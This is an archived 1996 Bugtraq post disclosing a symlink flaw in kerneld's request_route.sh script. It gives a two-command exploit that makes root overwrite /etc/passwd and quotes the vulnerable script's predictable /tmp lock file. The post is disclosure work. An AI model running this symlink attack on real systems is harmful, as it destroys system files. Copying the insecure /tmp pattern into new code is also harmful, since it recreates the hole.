Bugtraq mailing list archives
[linux-security] Big security hole in kerneld's request_route
From: @ (Igor Chudov @ home)
Date: Thu, 13 Jun 1996 17:51:57 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hi, I was just looking at sources of newly released linux 2.0. In modules-1.3.69k, in kerneld's subdirectory, there is a file request_route.sh (see below). It's supposed to run as root, whenever a route is requested. It is supposed to start pppd or something like that. As it appears, it is possible to destroy system philes (such as /etc/passwd and so on). Condition: you must have a system which has "on-demand loading" of pppd, whenever a route is requested. Exploit: you $ ln -s /etc/passwd /tmp/request-route you$ ping 204.251.80.30 Internally kerneld starts request_route, request_route writes pid to the symlinked file, and the file pointed to by symlink is overwritten. Did I miss something? - Igor. #! /bin/sh LOCK=/tmp/request-route PATH=/usr/sbin:$PATH # for ppp-2.2* export PATH # Note: you are _not_ forced to use ppp! # You can do whatever you want in order to satisfy the kernel route request. # It might be a good idea to set up the route as the default route, in case # you are using e.g. slip or plip or any other net driver... # # This script will be called from kerneld with the requested route as $1 # Create a chat script for your nameserver (as defined in /etc/resolv.conf) # chatfile=/etc/ppp/chat.$1 if [ -f $chatfile ] then # # Tune your favourite parameters to pppd, including the idle-disconnect option. # Kerneld will be automatically triggered to load slhc.o and ppp.o # pppd connect "chat -f $chatfile" /dev/modem 38400 \ idle-disconnect 600 modem defaultroute noipdefault \ & # let pppd detach itself whenever it wants to... # # Timer to be killed by ip-up, tunable! Check kerneld delay as well # sleep 60 & sleepid=$! echo $sleepid > $LOCK wait $sleepid rm -f $LOCK exit 0 else exit 1 fi -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMb+XDMJFmFyXKPzRAQHLzwP9HAD/WCkirGpBUjLXIdcmhQcQMf3eJMDk Y5tU/7KkXR2afOmEncZEQs57FOhHaVtDiAMZ0B25Dn0ef6qhbYSS3wjzjh2V8m0d OHxnoRHTSApM1mQA2WFPYkzfqmFHXzQBHur6xNkl6JcJ9FiLFSQp3cQBjgcafX0C CaDXkJNTNSI= =8zfD -----END PGP SIGNATURE-----
Current thread:
- [linux-security] Big security hole in kerneld's request_route Igor Chudov @ home (Jun 13)
- system() call in suid programs Not Joe (Jan 03)
- Re: system() call in suid programs Valdis.Kletnieks () vt edu (Jun 14)
- Re: system() call in suid programs Max Hailperin (Jun 14)
- Publically writable directories Thomas Koenig (Jun 16)
- Re: Publically writable directories Neil Soveran-Charley (Jun 16)
- Re: Publically writable directories Brian Mitchell (Jun 17)
- Re: Publically writable directories Thomas Koenig (Jun 18)
- Re: Publically writable directories Bill Pemberton (Jun 18)
- Re: Publically writable directories Thomas Koenig (Jun 18)
- Re: system() call in suid programs Valdis.Kletnieks () vt edu (Jun 14)
- system() call in suid programs Not Joe (Jan 03)
- Re: Publically writable directories Bill Pemberton (Jun 17)